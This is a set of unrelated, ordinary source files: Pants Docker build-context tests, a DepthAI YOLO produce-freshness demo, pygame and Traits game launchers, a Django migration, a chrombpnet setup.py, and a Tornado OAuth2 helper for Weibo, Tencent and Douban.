                  repository="upstream/{name}",
                  image_tags=["1.0"],
                  instructions=["FROM alpine:3.16.1"],
                )
                """
            ),
            "src/downstream/BUILD": "docker_image(name='image')",
            "src/downstream/Dockerfile": dedent(
                """\
                ARG BASE_IMAGE=src/upstream:image
                FROM $BASE_IMAGE
                """
            ),
        }
    )
    assert_build_context(
        rule_runner,
        Address("src/downstream", target_name="image"),
        expected_files=["src/downstream/Dockerfile", "src.upstream/image.docker-info.json"],
        build_upstream_images=True,
        expected_interpolation_context={
            "tags": {
                "baseimage": "1.0",
                "stage0": "1.0",
            },
            "build_args": {
                "BASE_IMAGE": "upstream/image:1.0",
            },
        },
        expected_num_upstream_images=1,
    )
def test_from_image_build_arg_dependency_overwritten(rule_runner: RuleRunner) -> None:
    """Overriding the FROM build-arg on the CLI replaces the upstream image dependency."""
    rule_runner.write_files(
        {
            "src/upstream/BUILD": dedent(
                """\
                docker_image(
                  name="image",
                  repository="upstream/{name}",
                  image_tags=["1.0"],
                  instructions=["FROM alpine:3.16.1"],
                )
                """
            ),
            "src/downstream/BUILD": "docker_image(name='image')",
            "src/downstream/Dockerfile": dedent(
                """\
                ARG BASE_IMAGE=src/upstream:image
                FROM $BASE_IMAGE
                """
            ),
        }
    )
    assert_build_context(
        rule_runner,
        Address("src/downstream", target_name="image"),
        expected_files=["src/downstream/Dockerfile"],
        build_upstream_images=True,
        expected_interpolation_context={
            "tags": {
                "baseimage": "3.10-slim",
                "stage0": "3.10-slim",
            },
            "build_args": {
                "BASE_IMAGE": "python:3.10-slim",
            },
        },
        expected_num_upstream_images=0,
        pants_args=["--docker-build-args=BASE_IMAGE=python:3.10-slim"],
    )
def test_from_image_build_arg_not_in_repo_issue_15585(rule_runner: RuleRunner) -> None:
    """A FROM build-arg naming a plain image (not an in-repo target) must not break parsing."""
    rule_runner.write_files(
        {
            "test/image/BUILD": "docker_image()",
            "test/image/Dockerfile": dedent(
                """\
                ARG PYTHON_VERSION="python:3.10.2-slim"
                FROM $PYTHON_VERSION
                """
            ),
        }
    )
    assert_build_context(
        rule_runner,
        Address("test/image", target_name="image"),
        expected_files=["test/image/Dockerfile"],
        build_upstream_images=True,
        expected_interpolation_context={
            "tags": {
                "baseimage": "3.10.2-slim",
                "stage0": "3.10.2-slim",
            },
            # PYTHON_VERSION will be treated like any other build ARG.
            "build_args": {},
        },
    )
def test_files_out_of_tree(rule_runner: RuleRunner) -> None:
    """File dependencies outside the image's own directory are still included."""
    # src/a:img_A -> res/static:files
    rule_runner.write_files(
        {
            "src/a/BUILD": dedent(
                """\
                docker_image(name="img_A", dependencies=["res/static:files"])
                """
            ),
            "res/static/BUILD": dedent(
                """\
                files(name="files", sources=["!BUILD", "**/*"])
                """
            ),
            "src/a/Dockerfile": "FROM base",
            "res/static/s01": "",
            "res/static/s02": "",
            "res/static/sub/s03": "",
        }
    )
    assert_build_context(
        rule_runner,
        Address("src/a", target_name="img_A"),
        expected_files=[
            "src/a/Dockerfile",
            "res/static/s01",
            "res/static/s02",
            "res/static/sub/s03",
        ],
    )
def test_packaged_pex_path(rule_runner: RuleRunner) -> None:
    """Pin the generated path of packaged pex binaries inside the build context."""
    # This test is here to ensure that we catch if there is any change in the generated path where
    # built pex binaries go, as we rely on that for dependency inference in the Dockerfile.
    rule_runner.write_files(
        {
            "src/docker/BUILD": """docker_image(dependencies=["src/python/proj/cli:bin"])""",
            "src/docker/Dockerfile": """FROM python:3.8""",
            "src/python/proj/cli/BUILD": """pex_binary(name="bin", entry_point="main.py")""",
            "src/python/proj/cli/main.py": """print("cli main")""",
        }
    )
    assert_build_context(
        rule_runner,
        Address("src/docker", target_name="docker"),
        expected_files=["src/docker/Dockerfile", "src.python.proj.cli/bin.pex"],
    )
def test_packaged_pex_environment(rule_runner: RuleRunner) -> None:
    """A pex built for a docker_environment ships wheels for that environment's platform."""
    rule_runner.write_files(
        {
            "BUILD": dedent(
                """
                docker_environment(
                    name="python_38",
                    image="python:3.8-buster@sha256:bc4b9fb034a871b285bea5418cedfcaa9d2ab5590fb5fb6f0c42aaebb2e2c911",
                    platform="linux_x86_64",
                    python_bootstrap_search_path=["<PATH>"],
                )
                python_requirement(name="psutil", requirements=["psutil==5.9.2"])
                """
            ),
            "src/docker/BUILD": """docker_image(dependencies=["src/python/proj/cli:bin"])""",
            "src/docker/Dockerfile": """FROM python:3.8""",
            "src/python/proj/cli/BUILD": dedent(
                """
                pex_binary(
                    name="bin",
                    entry_point="main.py",
                    environment="python_38",
                    dependencies=["//:psutil"],
                )
                """
            ),
            "src/python/proj/cli/main.py": """import psutil; assert psutil.Process.is_running()""",
        }
    )
    pex_file = "src.python.proj.cli/bin.pex"
    context = assert_build_context(
        rule_runner,
        Address("src/docker", target_name="docker"),
        pants_args=["--environments-preview-names={'python_38': '//:python_38'}"],
        expected_files=["src/docker/Dockerfile", pex_file],
    )
    # Confirm that the context contains a PEX for the appropriate platform.
    rule_runner.write_digest(context.digest, path_prefix="contents")
    with zipfile.ZipFile(os.path.join(rule_runner.build_root, "contents", pex_file), "r") as zf:
        assert json.loads(zf.read("PEX-INFO"))["distributions"].keys() == {
            "psutil-5.9.2-cp37-cp37m-manylinux_2_12_x86_64.manylinux2010_x86_64.manylinux_2_17_x86_64.manylinux2014_x86_64.whl",
            "psutil-5.9.2-cp38-cp38-manylinux_2_12_x86_64.manylinux2010_x86_64.manylinux_2_17_x86_64.manylinux2014_x86_64.whl",
        }
def test_interpolation_context_from_dockerfile(rule_runner: RuleRunner) -> None:
    """Stage tags are derived from each FROM line (named stages keep their name)."""
    rule_runner.write_files(
        {
            "src/docker/BUILD": "docker_image()",
            "src/docker/Dockerfile": dedent(
                """\
                FROM python:3.8
                FROM alpine:3.16.1 as interim
                FROM interim
                FROM scratch:1-1 as output
                """
            ),
        }
    )
    assert_build_context(
        rule_runner,
        Address("src/docker"),
        expected_files=["src/docker/Dockerfile"],
        expected_interpolation_context={
            "tags": {
                "baseimage": "3.8",
                "stage0": "3.8",
                "interim": "3.16.1",
                "stage2": "latest",
                "output": "1-1",
            },
            "build_args": {},
        },
    )
def test_synthetic_dockerfile(rule_runner: RuleRunner) -> None:
    """`instructions=` generates a synthetic Dockerfile.docker with the same tag handling."""
    rule_runner.write_files(
        {
            "src/docker/BUILD": dedent(
                """\
                docker_image(
                  instructions=[
                    "FROM python:3.8",
                    "FROM alpine:3.16.1 as interim",
                    "FROM interim",
                    "FROM scratch:1-1 as output",
                  ]
                )
                """
            ),
        }
    )
    assert_build_context(
        rule_runner,
        Address("src/docker"),
        expected_files=["src/docker/Dockerfile.docker"],
        expected_interpolation_context={
            "tags": {
                "baseimage": "3.8",
                "stage0": "3.8",
                "interim": "3.16.1",
                "stage2": "latest",
                "output": "1-1",
            },
            "build_args": {},
        },
    )
def test_shell_source_dependencies(rule_runner: RuleRunner) -> None:
    """shell_source(s) dependencies contribute only their matched .sh files."""
    rule_runner.write_files(
        {
            "src/docker/BUILD": dedent(
                """\
                docker_image(dependencies=[":entrypoint", ":shell"])
                shell_source(name="entrypoint", source="entrypoint.sh")
                shell_sources(name="shell", sources=["scripts/**/*.sh"])
                """
            ),
            "src/docker/Dockerfile": "FROM base",
            "src/docker/entrypoint.sh": "",
            "src/docker/scripts/s01.sh": "",
            "src/docker/scripts/s02.sh": "",
            "src/docker/scripts/random.file": "",
        }
    )
    assert_build_context(
        rule_runner,
        Address("src/docker"),
        expected_files=[
            "src/docker/Dockerfile",
            "src/docker/entrypoint.sh",
            "src/docker/scripts/s01.sh",
            "src/docker/scripts/s02.sh",
        ],
    )
def test_build_arg_defaults_from_dockerfile(rule_runner: RuleRunner) -> None:
    """Only build args listed in extra_build_args pick up values from the environment."""
    # Test that only explicitly defined build args in the BUILD file or pants configuration use the
    # environment for its values.
    rule_runner.write_files(
        {
            "src/docker/BUILD": dedent(
                """\
                docker_image(
                  extra_build_args=[
                    "base_version",
                  ]
                )
                """
            ),
            "src/docker/Dockerfile": dedent(
                """\
                ARG base_name=python
                ARG base_version=3.8
                FROM ${base_name}:${base_version}
                ARG NO_DEF
                ENV opt=${NO_DEF}
                """
            ),
        }
    )
    assert_build_context(
        rule_runner,
        Address("src/docker"),
        runner_options={
            "env": {
                "base_name": "no-effect",
                "base_version": "3.9",
            },
        },
        expected_files=["src/docker/Dockerfile"],
        expected_interpolation_context={
            "tags": {
                "baseimage": "${base_version}",
                "stage0": "${base_version}",
            },
            "build_args": {
                # `base_name` is not listed here, as it was not an explicitly defined build arg.
                "base_version": "3.9",
            },
        },
    )
@pytest.mark.parametrize(
    "dockerfile_arg_value, extra_build_arg_value, expect",
    [
        pytest.param(None, None, no_exception(), id="No args defined"),
        pytest.param(
            None,
            "",
            pytest.raises(ExecutionError, match=r"variable 'MY_ARG' is undefined"),
            id="No default value for build arg",
        ),
        pytest.param(None, "some default value", no_exception(), id="Default value for build arg"),
        pytest.param("", None, no_exception(), id="No build arg defined, and ARG without default"),
        pytest.param(
            "",
            "",
            pytest.raises(ExecutionError, match=r"variable 'MY_ARG' is undefined"),
            id="No default value from ARG",
        ),
        pytest.param(
            "", "some default value", no_exception(), id="Default value for build arg, ARG present"
        ),
        pytest.param(
            "some default value", None, no_exception(), id="No build arg defined, only ARG"
        ),
        pytest.param("some default value", "", no_exception(), id="Default value from ARG"),
        pytest.param(
            "some default value",
            "some other default",
            no_exception(),
            id="Default value for build arg, ARG default",
        ),
    ],
)
def test_undefined_env_var_behavior(
    rule_runner: RuleRunner,
    dockerfile_arg_value: str | None,
    extra_build_arg_value: str | None,
    expect: ContextManager,
) -> None:
    """A build arg with no value anywhere must raise; any default resolves it.

    Params encode: None = not declared, "" = declared without default,
    non-empty = declared with that default.
    """
    dockerfile_arg = ""
    if dockerfile_arg_value is not None:
        dockerfile_arg = "ARG MY_ARG"
        if dockerfile_arg_value:
            dockerfile_arg += f"={dockerfile_arg_value}"
    extra_build_args = ""
    if extra_build_arg_value is not None:
        extra_build_args = 'extra_build_args=["MY_ARG'
        if extra_build_arg_value:
            extra_build_args += f"={extra_build_arg_value}"
        extra_build_args += '"],'
    rule_runner.write_files(
        {
            "src/docker/BUILD": dedent(
                f"""\
                docker_image(
                  {extra_build_args}
                )
                """
            ),
            "src/docker/Dockerfile": dedent(
                f"""\
                FROM python:3.8
                {dockerfile_arg}
                """
            ),
        }
    )
    with expect:
        assert_build_context(
            rule_runner,
            Address("src/docker"),
            expected_files=["src/docker/Dockerfile"],
        )
@pytest.fixture(scope="session")
def build_context() -> DockerBuildContext:
    """Session-scoped build context with one undefined (MY_ARG) and one defaulted (DEF_ARG) arg."""
    rule_runner = create_rule_runner()
    rule_runner.write_files(
        {
            "src/docker/BUILD": dedent(
                """\
                docker_image(
                  extra_build_args=["DEF_ARG"],
                  instructions=[
                    "FROM python:3.8",
                    "ARG MY_ARG",
                    "ARG DEF_ARG=some-value",
                  ],
                )
                """
            ),
        }
    )
    return assert_build_context(
        rule_runner,
        Address("src/docker"),
        expected_files=["src/docker/Dockerfile.docker"],
    )
@pytest.mark.parametrize(
    "fmt_string, result, expectation",
    [
        pytest.param(
            "{build_args.MY_ARG}",
            None,
            pytest.raises(
                ValueError,
                match=(r"The build arg 'MY_ARG' is undefined\. Defined build args are: DEF_ARG\."),
            ),
            id="ARG_NAME",
        ),
        pytest.param(
            "{build_args.DEF_ARG}",
            "some-value",
            no_exception(),
            id="DEF_ARG",
        ),
    ],
)
def test_build_arg_behavior(
    build_context: DockerBuildContext,
    fmt_string: str,
    result: str | None,
    expectation: ContextManager,
) -> None:
    """Interpolating an undefined build arg raises; a defaulted one resolves."""
    with expectation:
        assert fmt_string.format(**build_context.interpolation_context) == result
def test_create_docker_build_context() -> None:
    """DockerBuildContext.create normalizes its inputs (sorted ids, deduped stages)."""
    context = DockerBuildContext.create(
        build_args=DockerBuildArgs.from_strings("ARGNAME=value1"),
        snapshot=EMPTY_SNAPSHOT,
        build_env=DockerBuildEnvironment.create({"ENVNAME": "value2"}),
        upstream_image_ids=["def", "abc"],
        dockerfile_info=DockerfileInfo(
            address=Address("test"),
            digest=EMPTY_DIGEST,
            source="test/Dockerfile",
            build_args=DockerBuildArgs.from_strings(),
            copy_source_paths=(),
            from_image_build_args=DockerBuildArgs.from_strings(),
            version_tags=("base latest", "stage1 1.2", "dev 2.0", "prod 2.0"),
        ),
    )
    assert list(context.build_args) == ["ARGNAME=value1"]
    assert dict(context.build_env.environment) == {"ENVNAME": "value2"}
    # Upstream image ids come back sorted.
    assert context.upstream_image_ids == ("abc", "def")
    assert context.dockerfile == "test/Dockerfile"
    # Stage names only (no versions); unnamed numeric stages are dropped.
    assert context.stages == ("base", "dev", "prod")
def test_pex_custom_output_path_issue14031(rule_runner: RuleRunner) -> None:
    """A pex_binary with a custom output_path lands at that path in the context."""
    rule_runner.write_files(
        {
            "project/test/BUILD": dedent(
                """\
                pex_binary(
                  name="test",
                  entry_point="main.py",
                  output_path="project/test.pex",
                )
                docker_image(
                  name="test-image",
                  dependencies=[":test"],
                )
                """
            ),
            "project/test/main.py": "print('Hello')",
            "project/test/Dockerfile": dedent(
                """\
                FROM python:3.8
                COPY project/test.pex .
                CMD ["./test.pex"]
                """
            ),
        }
    )
    assert_build_context(
        rule_runner,
        Address("project/test", target_name="test-image"),
        expected_files=["project/test/Dockerfile", "project/test.pex"],
    )
def test_dockerfile_instructions_issue_17571(rule_runner: RuleRunner) -> None:
    """With source=None, `instructions=` wins even if a Dockerfile exists on disk."""
    rule_runner.write_files(
        {
            "src/docker/Dockerfile": "do not use this file",
            "src/docker/BUILD": dedent(
                """\
                docker_image(
                  source=None,
                  instructions=[
                    "FROM python:3.8",
                  ]
                )
                """
            ),
        }
    )
    assert_build_context(
        rule_runner,
        Address("src/docker"),
        expected_files=["src/docker/Dockerfile.docker"],
        expected_interpolation_context={
            "tags": {
                "baseimage": "3.8",
                "stage0": "3.8",
            },
            "build_args": {},
        },
    )
|
#!/usr/bin/env python3
from pathlib import Path
import sys
import cv2
import depthai as dai
import numpy as np
import time

'''
Yolo-v3 device side decoding demo
YOLO v3 is a real-time object detection model implemented with Keras* from
this repository <https://github.com/david8862/keras-YOLOv3-model-set> and converted
to TensorFlow* framework. This model was pretrained on COCO* dataset with 80 classes.
'''

# Class labels for this custom two-class model (indices 0 and 1).
labelMap = ["Fresh", "Rotten"]

# When True, the displayed frame is the NN passthrough so frames and
# detections stay in lockstep; when False, the raw preview is shown.
syncNN = True

# Gen1 API: python3 depthai_demo.py -cnn yolo-v3 -sh 13
# pipeline.setOpenVINOVersion(version = dai.OpenVINO.Version.VERSION_2020_1)

# Default blob path, overridable by the first CLI argument.
yolo_v3_path = str((Path(__file__).parent / Path(
    'models/OpenVINO_2021_2/fresh_rotten_yolov4_openvino_2021.2_6shave.blob')).resolve().absolute())
if len(sys.argv) > 1:
    yolo_v3_path = sys.argv[1]

# Start defining a pipeline
pipeline = dai.Pipeline()

# Color camera source; the 416x416 preview matches the network input size.
cam = pipeline.createColorCamera()
cam.setPreviewSize(416, 416)
cam.setInterleaved(False)
cam.setFps(10)

# Device-side Yolo detection network.
nn = pipeline.createYoloDetectionNetwork()
nn.setConfidenceThreshold(0.7)
nn.setNumClasses(2)
nn.setCoordinateSize(4)

# Standard yolov3 anchors/masks:
# https://github.com/david8862/keras-YOLOv3-model-set/blob/master/cfg/yolov3.cfg
# https://github.com/david8862/keras-YOLOv3-model-set/blob/master/configs/yolo3_anchors.txt
anchors = np.array([10,13, 16,30, 33,23, 30,61, 62,45, 59,119, 116,90, 156,198, 373,326])
nn.setAnchors(anchors)
anchorMasks = {
    "side52": np.array([0, 1, 2]),
    "side26": np.array([3, 4, 5]),
    "side13": np.array([6, 7, 8]),
}
nn.setAnchorMasks(anchorMasks)
nn.setIouThreshold(0.5)
nn.setBlobPath(yolo_v3_path)
# Recommended configuration for best inference throughput: two inference
# threads, non-blocking input, queue size 1 to minimize latency.
nn.setNumInferenceThreads(2)
nn.input.setBlocking(False)
nn.input.setQueueSize(1)
cam.preview.link(nn.input)

# XLink outputs back to the host.
xout_rgb = pipeline.createXLinkOut()
xout_rgb.setStreamName("rgb")
if syncNN:
    nn.passthrough.link(xout_rgb.input)
else:
    cam.preview.link(xout_rgb.input)

xoutNN = pipeline.createXLinkOut()
xoutNN.setStreamName("detections")
nn.out.link(xoutNN.input)

# Annotation constants, hoisted out of the per-detection draw loop.
BOX_COLOR = (0, 255, 0)
LABEL_BG_COLOR = (70, 120, 70)  # greyish green background for text
TEXT_COLOR = (255, 255, 255)    # white text
TEXT_FONT = cv2.FONT_HERSHEY_SIMPLEX

# Pipeline defined, now connect to the device and run it.
with dai.Device(pipeline) as device:
    # Start pipeline
    device.startPipeline()

    # Output queues for the rgb frames and nn detections defined above.
    qRgb = device.getOutputQueue(name="rgb", maxSize=4, blocking=False)
    qDet = device.getOutputQueue(name="detections", maxSize=4, blocking=False)

    frame = None
    bboxes = []
    start_time = time.time()
    counter = 0
    fps = 0
    while True:
        if syncNN:
            # Blocking gets keep frame and detections paired.
            inRgb = qRgb.get()
            inDet = qDet.get()
        else:
            inRgb = qRgb.tryGet()
            inDet = qDet.tryGet()

        if inRgb is not None:
            frame = inRgb.getCvFrame()
        if inDet is not None:
            bboxes = inDet.detections
            counter += 1

        # Recompute the NN message rate over ~1 second windows.
        current_time = time.time()
        if (current_time - start_time) > 1:
            fps = counter / (current_time - start_time)
            counter = 0
            start_time = current_time

        if frame is not None:
            # Frame available: draw the bounding boxes on it and show it.
            height = frame.shape[0]
            width = frame.shape[1]
            for bbox in bboxes:
                # Denormalize the bounding box to pixel coordinates.
                x1 = int(bbox.xmin * width)
                x2 = int(bbox.xmax * width)
                y1 = int(bbox.ymin * height)
                y2 = int(bbox.ymax * height)
                try:
                    label = labelMap[bbox.label]
                except IndexError:
                    # Unknown class id: fall back to the numeric label as a
                    # string. (The original bare `except:` kept the raw int,
                    # which then crashed the string concatenation below.)
                    label = str(bbox.label)
                # Label text on a filled background, then the box itself.
                cv2.rectangle(frame, (x1, y1), (x2, y1 + 20), LABEL_BG_COLOR, -1)
                cv2.putText(frame, label + ': %.2f' % bbox.confidence, (x1 + 5, y1 + 15), TEXT_FONT, 0.5, TEXT_COLOR, 1)
                cv2.rectangle(frame, (x1, y1), (x2, y2), BOX_COLOR, 1)
            cv2.putText(frame, "NN fps: {:.2f}".format(fps), (2, frame.shape[0] - 4), cv2.FONT_HERSHEY_TRIPLEX, 0.4, TEXT_COLOR)
            cv2.imshow("rgb", frame)

        if cv2.waitKey(1) == ord('q'):
            break
|
import os
import sys
import pygame as pg
from pygame.constants import DOUBLEBUF
from pygame.locals import *
import asset
import events
from config import SCREEN_HEIGHT, SCREEN_WIDTH
from game_screen.game_screen import GameScreen
from victory_screen.end_screen import EndScreen
from screen import Screen
from title_screen.title_screen import TitleScreen
# One-time setup: pygame, background music on loop, fullscreen display, and
# the game's global event/asset state.
pg.init()
pg.mouse.set_visible(False)
pg.mixer_music.load(os.path.join('assets', 'music.ogg'))
pg.mixer_music.play(-1)  # -1 loops the track indefinitely
pg.mixer_music.set_volume(1)
screen: pg.Surface = pg.display.set_mode((SCREEN_WIDTH, SCREEN_HEIGHT), FULLSCREEN)
events.init()
asset.init()
pg.display.set_caption("A loo in the dark!")
# The screen currently being displayed; the game starts at the title screen.
currentDisplayScreen: Screen = TitleScreen()
clock = pg.time.Clock()
while True:
    for event in pg.event.get():
        # Quit on window close or Escape.
        if event.type == QUIT or event.type == KEYDOWN and event.key == K_ESCAPE:
            pg.quit()
            sys.exit()
        # Return/Enter starts a new game from the title or end screen.
        if (type(currentDisplayScreen) == TitleScreen or type(currentDisplayScreen) == EndScreen) \
                and event.type == KEYDOWN and event.key == K_RETURN:
            currentDisplayScreen = GameScreen()
        # USEREVENT drives events.tick() — presumably a periodic timer set up
        # in events.init(); verify in the events module.
        if event.type == USEREVENT:
            events.tick()
    screen.fill((0, 0, 0))
    # draw() returns a truthy Screen class when a screen transition is
    # requested; otherwise the current screen stays active.
    screenChange = currentDisplayScreen.draw(screen, clock)
    if screenChange:
        currentDisplayScreen = screenChange()
    pg.display.flip()
|
# Generated by Django 3.1 on 2020-08-17 16:51
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
class Migration(migrations.Migration):
    # Auto-generated by Django 3.1. Adds `Vote.date` (auto_now_add) and
    # `Vote.poll` (FK), and gives `Choice.poll` related_name='choices'.
    # preserve_default=False records that the defaults below were one-off
    # values used only to backfill existing rows, not model defaults.

    dependencies = [
        ('polls', '0005_auto_20200817_1327'),
    ]

    operations = [
        migrations.AddField(
            model_name='vote',
            name='date',
            field=models.DateTimeField(auto_now_add=True, default=django.utils.timezone.now),
            preserve_default=False,
        ),
        migrations.AddField(
            model_name='vote',
            name='poll',
            field=models.ForeignKey(default=None, on_delete=django.db.models.deletion.CASCADE, to='polls.poll'),
            preserve_default=False,
        ),
        migrations.AlterField(
            model_name='choice',
            name='poll',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='choices', to='polls.poll'),
        ),
    ]
|
#!/usr/bin/env python3.6
# NOTE: requires python 3.6, you get a syntax error otherwise
from dataclasses import dataclass, field
from typing import List, Optional, Set
@dataclass
class FluentArg:
    """A single typed argument of a fluent: a (name, type) pair.

    Both fields default to None, so the annotations are Optional (the
    original `name: str = None` was mistyped).
    """

    name: Optional[str] = None
    type: Optional[str] = None
@dataclass
class OperatorResource:
    """A named resource with an integer value.

    NOTE(review): unused in this snippet (cf. the commented-out `#resources:`
    field on DomainFluent below); presumably consumed elsewhere.
    """

    name: str
    value: int
@dataclass
class DomainFluent:
    """A named fluent with a list of typed arguments."""

    name: str
    args: List[FluentArg] = field(default_factory=list)
    #resources:

    @classmethod
    def init_from_list(cls, name, args):
        """Alternate constructor from [[arg_name, arg_type], ...] pairs.

        The first parameter was previously named `self` on this classmethod;
        it is the class, so it is now conventionally named `cls`.
        """
        fluent = cls(name)
        for arg_name, arg_type in args:
            fluent.args.append(FluentArg(arg_name, arg_type))
        return fluent
if __name__ == '__main__':
    # Smoke test: build a fluent from (name, type) pairs and print it.
    my_fluent = DomainFluent.init_from_list('RobotAt', [['Origin','Location'], ['Destination','Location']])
    print('fluent name : {0}'.format(my_fluent.name))
    print('fluent args : {0}'.format(my_fluent.args))
|
import sys
import sdl2
import sdl2.ext
from traits.api import Enum, HasTraits
from traitsui.api import Item, OKCancelButtons, View
# import other games here
from Games.air_hockey import AirHockeyGame
from Games.pong2 import PongGame
from Games.hello_world import HelloWorldGame
class GameInfo(HasTraits):
    """Launcher options collected from the user via a TraitsUI dialog."""

    # Closed sets of choices; the first value of each Enum is the default.
    game_mode = Enum('Classic Pong', 'Hello World', 'Air Hockey')
    num_players = Enum(1, 2)
    difficulty = Enum('Easy', 'Medium', 'Pong Master')
    # Difficulty only applies against the AI, so it is disabled for 2 players.
    view = View(Item(name='game_mode'),
                Item(name='num_players'),
                Item(name='difficulty',
                     enabled_when='num_players == 1'),
                buttons = OKCancelButtons
                )
# basically now in order to add a new game all we need to do is make a class
# for that game and make it have a run method that accepts game info. Actually
# the requirement is probably looser than that, it just needs to be importable
# and runable from inside this script
if __name__ == "__main__":
    # Show the options dialog, then hand control to the selected game.
    game_info = GameInfo()
    game_info.configure_traits()
    # Dispatch table: adding a new game means adding one entry here.
    launchers = {
        'Classic Pong': PongGame,
        'Hello World': HelloWorldGame,
        'Air Hockey': AirHockeyGame,
    }
    selected = launchers.get(game_info.game_mode)
    if selected is not None:
        sys.exit(selected.run(game_info))
|
# Copyright 2021 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import annotations
from pants.engine.addresses import UnparsedAddressInputs
from pants.option.option_types import TargetListOption
from pants.option.subsystem import Subsystem
from pants.util.strutil import softwrap
class ScroogeJavaSubsystem(Subsystem):
    """Java-specific options for the Scrooge Thrift IDL compiler."""

    options_scope = "java-scrooge"
    help = "Java-specific options for the Scrooge Thrift IDL compiler (https://twitter.github.io/scrooge/)."

    # Raw option value: addresses of `jvm_artifact` targets injected as
    # dependencies of every `thrift_source` target.
    _runtime_dependencies = TargetListOption(
        help=softwrap(
            """
            A list of addresses to `jvm_artifact` targets for the runtime
            dependencies needed for generated Java code to work. For example,
            `['3rdparty/jvm:libthrift']`. These dependencies will
            be automatically added to every `thrift_source` target. At the very least,
            this option must be set to a `jvm_artifact` for the
            `org.apache.thrift:libthrift` runtime library.
            """
        ),
    )

    @property
    def runtime_dependencies(self) -> UnparsedAddressInputs:
        # Wrap the raw addresses so the engine can resolve them later;
        # owning_address=None since subsystem options have no owning target.
        return UnparsedAddressInputs(
            self._runtime_dependencies,
            owning_address=None,
            description_of_origin=f"the option `[{self.options_scope}].runtime_dependencies`",
        )
|
from setuptools import setup, find_packages

# Generate install_requires from the requirements.txt file. The context
# manager guarantees the handle is closed (the original leaked it).
with open('requirements.txt', 'r') as requirements_file:
    install_requires = requirements_file.read().strip().split('\n')
print(f"install_requires:{install_requires}")

# All setup() keyword arguments, collected in one dict.
config = {
    'name': 'chrombpnet',
    'author_email': 'anusri @ stanford.edu',
    'license': 'MIT',
    'include_package_data': True,
    'description': 'chrombpnet predicts chromatin accessibility from sequence',
    'download_url': 'https://github.com/kundajelab/chrombpnet',
    'version': '0.1.3',
    'packages': find_packages(),
    'python_requires': '>=3.8',
    'install_requires': install_requires,
    'zip_safe': False,
    'scripts': [
        'chrombpnet/training/models/bpnet_model.py',
        'chrombpnet/training/models/chrombpnet_with_bias_model.py'
    ],
    'entry_points': {'console_scripts': [
        'chrombpnet = chrombpnet.CHROMBPNET:main',
        'print_meme_motif_file = chrombpnet.data.__init__:print_meme_motif_file']}
}

if __name__ == '__main__':
    setup(**config)
|
#!/usr/bin/env python
# encoding: utf-8
"""
oauth2lib.py
Created by yang.zhou on 2012-10-06.
Copyright (c) 2012 zhouyang.me. All rights reserved.
"""
import logging
import requests
import json
from urllib import urlencode
from urlparse import parse_qs
from tornado.auth import OAuth2Mixin
from tornado.web import asynchronous
from tornado import httpclient
from tornado.httputil import HTTPHeaders, url_concat
from tornado import escape
from tornado import gen
def repost_request_weibo(url, access_token, post_id,
        post_status, is_comment, **kwargs):
    """Repost a weibo status through the OAuth2-protected repost endpoint.

    Returns the `requests` Response object unmodified.
    """
    auth_header = {'Authorization': 'OAuth2 %s' % access_token}
    # The token and target post id go in the query string; the new status
    # text and comment flag go in the form body.
    query = urlencode({"access_token": access_token, "id": post_id})
    payload = {
        "status": post_status,
        "is_comment": is_comment
    }
    return requests.post(url + "?" + query, headers=auth_header, data=payload)
def message_request(url, port, access_token, content, **kwargs):
    """Post a status update `content` to the service named by `port`.

    Returns the raw response body (weibo), the parsed "data" field (tencent),
    or None for douban / any non-success path (the non-200 branches fall
    through to the final `return None`).
    """
    header = {'Authorization': 'OAuth2 %s' % access_token}
    if port == "weibo":
        # Weibo: token in the query string, status text in the form body.
        url += "?" + urlencode({"access_token": access_token})
        response = requests.post(url, headers=header, data={"status": content})
        if response.status_code == 200:
            return response.content
    elif port == "tencent":
        # Tencent requires OAuth 2.a extras (app key, openid, client ip).
        body = {"access_token": access_token,
                "oauth_consumer_key": kwargs["app_key"],
                "openid": kwargs["openid"],
                "client_ip": kwargs["client_ip"],
                "oauth_version": "2.a",
                "scope":"all",
                "format": "json",
                "content": content}
        response = requests.post(url, headers=header, data=body)
        if response.status_code == 200:
            # errcode == 0 means success in Tencent's JSON envelope.
            content = json.loads(response.content)
            if content.get("errcode") == 0:
                logging.info("tencent message_request success")
                return content.get("data")
    elif port == "douban":
        # Douban uses Bearer auth; the response is only logged, never returned.
        header = {'Authorization': 'Bearer %s' %access_token}
        body = {"access_token": access_token,
                "source": kwargs["app_key"],
                "text": content,
                "attachment": kwargs["attachment"]}
        response = requests.post(url, headers=header, data=body)
        if response.status_code == 200:
            logging.info(response.content)
        else:
            logging.info(response.content)
    return None
class DoubanMixin(OAuth2Mixin):
    """Tornado OAuth2 mix-in for Douban sign-in and API calls.

    NOTE(review): this module is Python 2 (print statements, urllib.urlencode)
    and uses the long-removed `tornado.web.asynchronous` callback style.
    """

    _OAUTH_ACCESS_TOKEN_URL = "https://www.douban.com/service/auth2/token"
    _OAUTH_AUTHORIZE_URL = "https://www.douban.com/service/auth2/auth"
    _OAUTH_NO_CALLBACKS = False
    _OAUTH_USER_INFO_URL = "https://api.douban.com/v2/user/~me"
    _PORT = "douban"

    def _on_get_user_info(self, callback, oauth2_info, user):
        # Normalize the raw Douban profile into the app's user_info dict.
        if user is None:
            callback(None)
            return
        # Debug dump of the raw profile (Python 2 print statement).
        for k,v in user.items():
            print "%s: %s" %(k, v)
        user_info = {
            "username": "%s#%s" %(user.get("name"), self._PORT),
            "nickname": user.get("name"),
            "gender": user.get("gender"),
            "access_token": oauth2_info["access_token"],
            "oauth_id": user.get("id"),
            "port": self._PORT,
            "oauth_info": {
                "profile_image_url": user.get("avatar"),
                "oauth2_expires": oauth2_info["expires_in"],
                # NOTE(review): .encode crashes if "desc" is missing (None).
                "description": user.get("desc").encode("utf-8"),
                "location": user.get("loc_name"),
            }
        }
        callback(user_info)

    def get_authenticated_user(self, redirect_uri, client_id, client_secret, code, callback):
        # Exchange the authorization code for an access token (POST).
        http_client = httpclient.AsyncHTTPClient()
        args = {
            "redirect_uri": redirect_uri,
            "code": code,
            "client_id": client_id,
            "client_secret": client_secret,
            "extra_params": {"grant_type": "authorization_code"}
        }
        http_client.fetch(
            self._oauth_request_token_url(**args),
            self.async_callback(
                self._on_access_token,
                redirect_uri,
                client_id,
                client_secret,
                callback
            ),
            method="POST",
            body=urlencode(args))

    def _on_access_token(self, redirect_uri, client_id, client_secret, callback, response):
